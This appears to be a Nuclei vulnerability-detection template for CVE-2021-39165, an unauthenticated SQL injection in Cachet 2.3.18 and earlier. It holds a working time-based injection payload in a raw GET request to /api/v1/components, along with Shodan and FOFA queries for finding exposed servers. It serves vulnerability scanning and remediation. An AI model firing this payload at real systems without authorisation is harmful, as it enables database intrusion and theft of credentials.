id: CVE-2021-39165 info: name: Cachet <=2.3.18 - SQL Injection author: tess severity: medium description: | Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor. reference: - - - - - classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-39165 cwe-id: CWE-287 epss-score: 0.04209 epss-percentile: 0.92226 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: chachethq product: cachet shodan-query: http.favicon.hash:-1606065523 fofa-query: icon_hash=-1606065523 tags: cve,cve2021,cachet,sqli,chachethq http: - raw: - | @timeout: 20s GET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1 Host: {{Hostname}} redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and # digest: 4a0a0047304502207d446c3957624653dc008a7ab15069eeed694d1099c94c6c977a81d0102dd05a022100d4e4d4f86b4d2f06d8966f18d607297ad2bc92f0fe4a9083ec4da8b419a74743:922c64590222798bb761d5b6d8e72950